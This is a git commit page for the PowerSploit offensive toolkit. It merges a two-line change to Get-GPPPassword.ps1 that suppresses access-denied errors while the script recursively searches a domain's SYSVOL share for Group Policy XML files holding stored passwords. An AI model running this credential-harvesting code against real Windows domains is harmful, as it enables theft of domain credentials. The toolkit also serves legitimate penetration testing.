diff options
author | Matt Graeber <mattgraeber@gmail.com> | 2013-08-17 17:04:15 -0700 |
---|---|---|
committer | Matt Graeber <mattgraeber@gmail.com> | 2013-08-17 17:04:15 -0700 |
commit | 66face4488625ad5079311c68fc92d22f705b6d4 (patch) | |
tree | f08bd44cd8bbc276b16ca1c70581409cdf6fc831 | |
parent | 9577a4e2c2ea2679c96874498de037a88911962b (diff) | |
parent | c623814116fbefa86576a9d3651c8df59faa12ef (diff) | |
download | PowerSploit-66face4488625ad5079311c68fc92d22f705b6d4.tar.gz PowerSploit-66face4488625ad5079311c68fc92d22f705b6d4.zip |
Merge pull request #11 from hajdbo/patch-1
added ErrorAction SilentlyContinue to Get-ChildItem
-rw-r--r-- | Exfiltration/Get-GPPPassword.ps1 | 4 |
1 files changed, 2 insertions, 2 deletions
diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 7204a45..c905f08 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -64,8 +64,8 @@ if (((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False) {throw 'Machine is not joined to a domain.'} if (($Env:USERDNSDOMAIN) -eq $Null) {throw 'Account is not a domain account.'} - #discover potential files containing passwords - $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -Include 'groups.xml','services.xml','scheduledtasks.xml','datasources.xml' + #discover potential files containing passwords ; not complaining in case of denied access to a directory + $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'groups.xml','services.xml','scheduledtasks.xml','datasources.xml' foreach ($File in $XMLFiles) { |